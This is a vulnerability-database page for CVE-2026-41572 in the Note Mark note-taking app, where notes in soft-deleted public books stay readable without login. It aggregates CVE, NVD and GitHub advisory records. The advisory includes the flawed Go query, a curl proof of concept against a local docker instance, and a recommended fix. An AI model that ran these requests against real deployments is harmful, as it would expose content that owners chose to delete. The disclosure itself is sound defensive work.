Vulnerability-Lookup

CVE-2026-41572 (GCVE-0-2026-41572)

Vulnerability from cvelistv5 – Published: 2026-05-04 17:44 – Updated: 2026-05-04 19:39

Title

Note Mark: Unauthenticated read of notes and assets in soft-deleted public books

Summary

Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw "JOIN books ..." clauses used by the note and asset queries. This issue has been patched in version 0.19.3.

Severity

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-285 - Improper Authorization

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/enchant97/note-mark/security/a…	x_refsource_CONFIRM
https://github.com/enchant97/note-mark/releases/t…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
enchant97	note-mark	Affected: < 0.19.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41572",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T19:39:34.473785Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T19:39:55.331Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "note-mark",
          "vendor": "enchant97",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.19.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM\u0027s soft-delete scope does not reach the raw \"JOIN books ...\" clauses used by the note and asset queries. This issue has been patched in version 0.19.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-285",
              "description": "CWE-285: Improper Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-04T17:44:01.157Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf"
        },
        {
          "name": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3"
        }
      ],
      "source": {
        "advisory": "GHSA-3gr9-485j-v4xf",
        "discovery": "UNKNOWN"
      },
      "title": "Note Mark: Unauthenticated read of notes and assets in soft-deleted public books"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41572",
    "datePublished": "2026-05-04T17:44:01.157Z",
    "dateReserved": "2026-04-21T14:15:21.957Z",
    "dateUpdated": "2026-05-04T19:39:55.331Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41572",
      "date": "2026-06-07",
      "epss": "0.0004",
      "percentile": "0.12574"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41572\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-04T18:16:29.763\",\"lastModified\":\"2026-05-07T15:43:39.827\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM\u0027s soft-delete scope does not reach the raw \\\"JOIN books ...\\\" clauses used by the note and asset queries. This issue has been patched in version 0.19.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-285\"}]}],\"references\":[{\"url\":\"https://github.com/enchant97/note-mark/releases/tag/v0.19.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41572\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-04T19:39:34.473785Z\"}}}], \"references\": [{\"url\": \"https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-04T19:39:51.722Z\"}}], \"cna\": {\"title\": \"Note Mark: Unauthenticated read of notes and assets in soft-deleted public books\", \"source\": {\"advisory\": \"GHSA-3gr9-485j-v4xf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"enchant97\", \"product\": \"note-mark\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.19.3\"}]}], \"references\": [{\"url\": \"https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf\", \"name\": \"https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/enchant97/note-mark/releases/tag/v0.19.3\", \"name\": \"https://github.com/enchant97/note-mark/releases/tag/v0.19.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM\u0027s soft-delete scope does not reach the raw \\\"JOIN books ...\\\" clauses used by the note and asset queries. This issue has been patched in version 0.19.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-285\", \"description\": \"CWE-285: Improper Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-04T17:44:01.157Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41572\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-04T19:39:55.331Z\", \"dateReserved\": \"2026-04-21T14:15:21.957Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-04T17:44:01.157Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-41572

Vulnerability from fkie_nvd - Published: 2026-05-04 18:16 - Updated: 2026-05-07 15:43

Severity

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/enchant97/note-mark/releases/tag/v0.19.3
	security-advisories@github.com	https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM\u0027s soft-delete scope does not reach the raw \"JOIN books ...\" clauses used by the note and asset queries. This issue has been patched in version 0.19.3."
    }
  ],
  "id": "CVE-2026-41572",
  "lastModified": "2026-05-07T15:43:39.827",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-04T18:16:29.763",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-285"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-3GR9-485J-V4XF

Vulnerability from github – Published: 2026-04-25 23:40 – Updated: 2026-05-07 20:20

Summary

Note Mark: Unauthenticated read of notes and assets in soft-deleted public books

Details

Summary

After a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw JOIN books ... clauses used by the note and asset queries.

Details

DELETE /api/books/{bookID} sets books.deleted_at to the current time. The book-level endpoint starts returning 404, which matches the owner's expectation that the book is gone. The note service and asset service query notes with a raw join that does not filter books.deleted_at IS NULL:

// backend/services/notes.go:91-98 (GetNoteByID)
func (s NotesService) GetNoteByID(currentUserID *uuid.UUID, noteID uuid.UUID) (db.Note, error) {
    var note db.Note
    return note, dbErrorToServiceError(db.DB.
        Preload("Book").
        Joins("JOIN books ON books.id = notes.book_id").
        Where("owner_id = ? OR is_public = ?", currentUserID, true).
        First(&note, "notes.id = ?", noteID).Error)
}

GORM applies its soft-delete scope to the primary model of a query (here, notes) and to implicit Joins("Book") association clauses. It does not rewrite raw SQL passed to Joins. The soft-deleted book row keeps is_public = true, so the WHERE owner_id = ? OR is_public = ? clause still evaluates true for any caller on a book that was public at deletion time. For an unauthenticated caller (currentUserID = nil), owner_id = NULL fails but is_public = true passes, so the note query returns the row.

note-mark has a restore flow at PUT /api/notes/{noteID}/restore (backend/services/notes.go:232-262) that un-deletes the note and the parent book in one transaction. Owner access to soft-deleted notes is deliberate for that path; the comment at line 253 spells out the intent. The bug is that is_public = true survives the deletion, so unauthenticated callers keep access the owner chose to revoke.

The same raw-join pattern repeats at 9 more call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and 4 call sites in backend/services/assets.go (lines 29, 73, 106, 143). Every public endpoint that reads a note or an asset inherits the bug.

Proof of Concept

Tested against note-mark v0.19.2.

Step 1: Start note-mark.

docker run -d --name note-mark-poc -p 8088:8080 \
  ghcr.io/enchant97/note-mark-backend:0.19.2

Step 2: Alice signs up and logs in.

curl -X POST http://localhost:8088/api/users \
  -H 'Content-Type: application/json' \
  -d '{"username":"alice","password":"Alicepass123!","name":"Alice"}'

curl -c alice.cookies -X POST http://localhost:8088/api/auth/token \
  -H 'Content-Type: application/json' \
  -d '{"grant_type":"password","username":"alice","password":"Alicepass123!"}'

Step 3: Alice creates a public book and adds a note with content. Save the IDs from each response.

curl -b alice.cookies -X POST http://localhost:8088/api/books \
  -H 'Content-Type: application/json' \
  -d '{"name":"Alice Public Book","slug":"public-book","isPublic":true}'
# {"id":"<BOOK_ID>", ...}

curl -b alice.cookies -X POST http://localhost:8088/api/books/<BOOK_ID>/notes \
  -H 'Content-Type: application/json' \
  -d '{"name":"Secret Note","slug":"secret-note"}'
# {"id":"<NOTE_ID>", ...}

curl -b alice.cookies -X PUT http://localhost:8088/api/notes/<NOTE_ID>/content \
  -H 'Content-Type: text/plain' \
  --data 'This is Alice secret note content.'

Step 4: Bob (no cookie) reads the note while the book is still live. This is expected for a public book.

curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

Step 5: Alice soft-deletes the book.

curl -b alice.cookies -X DELETE http://localhost:8088/api/books/<BOOK_ID>
# HTTP/1.1 204 No Content

Step 6: The book endpoint 404s. The note endpoints still serve Alice's content to Bob.

curl -w "\n%{http_code}\n" http://localhost:8088/api/books/<BOOK_ID>
# 404

curl -w "\n%{http_code}\n" http://localhost:8088/api/notes/<NOTE_ID>
# {"id":"<NOTE_ID>","name":"Secret Note", ...}
# 200

curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

curl http://localhost:8088/api/slug/alice/books/public-book/notes/secret-note
# {"id":"<NOTE_ID>","name":"Secret Note", ...}

A companion script that drives Steps 1-6 ships at pocs/poc_005_bac_soft_deleted_book.sh.

Impact

Any owner who soft-deletes a public book expecting the content to drop off the internet is wrong. Notes, markdown content, and uploaded assets stay readable for every unauthenticated caller who knows the note ID or the slug path. Slugs are human-readable and change hands in documentation, notes, and bug trackers. The leak covers every public note and asset endpoint, not a single handler. Private books are not affected because is_public = false and owner_id = NULL both fail the visibility check for non-owners.

Recommended Fix

Add a soft-delete filter to the visibility clause on every raw Joins("JOIN books ..."). Keep the owner's access intact so the restore flow at PUT /api/notes/{id}/restore continues to work:

// backend/services/notes.go:91-98 (GetNoteByID)
return note, dbErrorToServiceError(db.DB.
    Preload("Book").
    Joins("JOIN books ON books.id = notes.book_id").
    Where("(books.deleted_at IS NULL OR books.owner_id = ?)", currentUserID).
    Where("owner_id = ? OR is_public = ?", currentUserID, true).
    First(&note, "notes.id = ?", noteID).Error)

The same transform applies to each of the 13 call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and backend/services/assets.go (lines 29, 73, 106, 143). backend/cli/clean.go:31 uses the same join pattern but is a maintenance CLI and does not need the fix.

Found by aisafe.io

Severity

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/enchant97/note-mark/backend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260417132843-d1bf845a2a2d"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41572"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-25T23:40:37Z",
    "nvd_published_at": "2026-05-04T18:16:29Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nAfter a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at `/api/notes/{id}`, `/api/notes/{id}/content`, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM\u0027s soft-delete scope does not reach the raw `JOIN books ...` clauses used by the note and asset queries.\n\n## Details\n\n`DELETE /api/books/{bookID}` sets `books.deleted_at` to the current time. The book-level endpoint starts returning 404, which matches the owner\u0027s expectation that the book is gone. The note service and asset service query notes with a raw join that does not filter `books.deleted_at IS NULL`:\n\n```go\n// backend/services/notes.go:91-98 (GetNoteByID)\nfunc (s NotesService) GetNoteByID(currentUserID *uuid.UUID, noteID uuid.UUID) (db.Note, error) {\n    var note db.Note\n    return note, dbErrorToServiceError(db.DB.\n        Preload(\"Book\").\n        Joins(\"JOIN books ON books.id = notes.book_id\").\n        Where(\"owner_id = ? OR is_public = ?\", currentUserID, true).\n        First(\u0026note, \"notes.id = ?\", noteID).Error)\n}\n```\n\nGORM applies its soft-delete scope to the primary model of a query (here, `notes`) and to implicit `Joins(\"Book\")` association clauses. It does not rewrite raw SQL passed to `Joins`. The soft-deleted book row keeps `is_public = true`, so the `WHERE owner_id = ? OR is_public = ?` clause still evaluates true for any caller on a book that was public at deletion time. For an unauthenticated caller (`currentUserID = nil`), `owner_id = NULL` fails but `is_public = true` passes, so the note query returns the row.\n\nnote-mark has a restore flow at `PUT /api/notes/{noteID}/restore` (`backend/services/notes.go:232-262`) that un-deletes the note and the parent book in one transaction. Owner access to soft-deleted notes is deliberate for that path; the comment at line 253 spells out the intent. The bug is that `is_public = true` survives the deletion, so unauthenticated callers keep access the owner chose to revoke.\n\nThe same raw-join pattern repeats at 9 more call sites in `backend/services/notes.go` (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and 4 call sites in `backend/services/assets.go` (lines 29, 73, 106, 143). Every public endpoint that reads a note or an asset inherits the bug.\n\n## Proof of Concept\n\nTested against `note-mark` v0.19.2.\n\nStep 1: Start note-mark.\n\n```bash\ndocker run -d --name note-mark-poc -p 8088:8080 \\\n  ghcr.io/enchant97/note-mark-backend:0.19.2\n```\n\nStep 2: Alice signs up and logs in.\n\n```bash\ncurl -X POST http://localhost:8088/api/users \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"alice\",\"password\":\"Alicepass123!\",\"name\":\"Alice\"}\u0027\n\ncurl -c alice.cookies -X POST http://localhost:8088/api/auth/token \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"grant_type\":\"password\",\"username\":\"alice\",\"password\":\"Alicepass123!\"}\u0027\n```\n\nStep 3: Alice creates a public book and adds a note with content. Save the IDs from each response.\n\n```bash\ncurl -b alice.cookies -X POST http://localhost:8088/api/books \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"name\":\"Alice Public Book\",\"slug\":\"public-book\",\"isPublic\":true}\u0027\n# {\"id\":\"\u003cBOOK_ID\u003e\", ...}\n\ncurl -b alice.cookies -X POST http://localhost:8088/api/books/\u003cBOOK_ID\u003e/notes \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"name\":\"Secret Note\",\"slug\":\"secret-note\"}\u0027\n# {\"id\":\"\u003cNOTE_ID\u003e\", ...}\n\ncurl -b alice.cookies -X PUT http://localhost:8088/api/notes/\u003cNOTE_ID\u003e/content \\\n  -H \u0027Content-Type: text/plain\u0027 \\\n  --data \u0027This is Alice secret note content.\u0027\n```\n\nStep 4: Bob (no cookie) reads the note while the book is still live. This is expected for a public book.\n\n```bash\ncurl http://localhost:8088/api/notes/\u003cNOTE_ID\u003e/content\n# This is Alice secret note content.\n```\n\nStep 5: Alice soft-deletes the book.\n\n```bash\ncurl -b alice.cookies -X DELETE http://localhost:8088/api/books/\u003cBOOK_ID\u003e\n# HTTP/1.1 204 No Content\n```\n\nStep 6: The book endpoint 404s. The note endpoints still serve Alice\u0027s content to Bob.\n\n```bash\ncurl -w \"\\n%{http_code}\\n\" http://localhost:8088/api/books/\u003cBOOK_ID\u003e\n# 404\n\ncurl -w \"\\n%{http_code}\\n\" http://localhost:8088/api/notes/\u003cNOTE_ID\u003e\n# {\"id\":\"\u003cNOTE_ID\u003e\",\"name\":\"Secret Note\", ...}\n# 200\n\ncurl http://localhost:8088/api/notes/\u003cNOTE_ID\u003e/content\n# This is Alice secret note content.\n\ncurl http://localhost:8088/api/slug/alice/books/public-book/notes/secret-note\n# {\"id\":\"\u003cNOTE_ID\u003e\",\"name\":\"Secret Note\", ...}\n```\n\nA companion script that drives Steps 1-6 ships at `pocs/poc_005_bac_soft_deleted_book.sh`.\n\n## Impact\n\nAny owner who soft-deletes a public book expecting the content to drop off the internet is wrong. Notes, markdown content, and uploaded assets stay readable for every unauthenticated caller who knows the note ID or the slug path. Slugs are human-readable and change hands in documentation, notes, and bug trackers. The leak covers every public note and asset endpoint, not a single handler. Private books are not affected because `is_public = false` and `owner_id = NULL` both fail the visibility check for non-owners.\n\n## Recommended Fix\n\nAdd a soft-delete filter to the visibility clause on every raw `Joins(\"JOIN books ...\")`. Keep the owner\u0027s access intact so the restore flow at `PUT /api/notes/{id}/restore` continues to work:\n\n```go\n// backend/services/notes.go:91-98 (GetNoteByID)\nreturn note, dbErrorToServiceError(db.DB.\n    Preload(\"Book\").\n    Joins(\"JOIN books ON books.id = notes.book_id\").\n    Where(\"(books.deleted_at IS NULL OR books.owner_id = ?)\", currentUserID).\n    Where(\"owner_id = ? OR is_public = ?\", currentUserID, true).\n    First(\u0026note, \"notes.id = ?\", noteID).Error)\n```\n\nThe same transform applies to each of the 13 call sites in `backend/services/notes.go` (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and `backend/services/assets.go` (lines 29, 73, 106, 143). `backend/cli/clean.go:31` uses the same join pattern but is a maintenance CLI and does not need the fix.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-3gr9-485j-v4xf",
  "modified": "2026-05-07T20:20:15Z",
  "published": "2026-04-25T23:40:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41572"
    },
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/commit/d1bf845a2a2df01e2eca6f556287db4ec6f773cf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/enchant97/note-mark"
    },
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Note Mark: Unauthenticated read of notes and assets in soft-deleted public books"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41572 (GCVE-0-2026-41572)

FKIE_CVE-2026-41572

GHSA-3GR9-485J-V4XF

Summary

Details

Proof of Concept

Impact

Recommended Fix

Tags

Sightings

Nomenclature